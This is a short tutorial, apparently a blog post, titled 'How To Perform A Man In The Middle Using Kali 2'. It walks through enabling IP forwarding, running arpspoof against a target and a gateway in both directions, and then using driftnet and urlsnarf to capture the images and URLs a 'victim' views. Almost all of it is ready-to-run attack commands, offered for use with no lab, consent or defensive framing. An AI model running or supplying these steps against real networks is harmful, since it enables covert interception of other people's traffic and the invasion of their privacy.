How To Perform A Man In The Middle Using Kali 2

A man in the middle attack is simply someone sitting in between your browser and a legitimate website. Data can be altered or snooped on during this.

Arp spoofing is the process of making machines on your network believe you are the gateway. Thus all data flows through you and vice versa.


Today we’ll be looking at how to perform a Man In The Middle to capture images and urls by the victim.

Requirements are Kali 2

1. Open 3 terminals


2. Set up port forwarding

Run this command and if the output is 0 then we need to change it to 1

$ cat /proc/sys/net/ipv4/ip_forward
$ echo 1 >> /proc/sys/net/ipv4/ip_forward


3. Run arpspoof


$ arpspoof -i eth0 targetiphere gatewayiphere


and then in another terminal

$ arpspoof -i eth0 gatewayiphere targetiphere


4. Run driftnet

This will capture images opened by the victim and display them in the black box.

$ driftnet -i eth0


Bonus: Run urlsnarf to capture http requests

$ urlsnarf -i eth0

Or simply open up Wireshark and capture packets passing through you.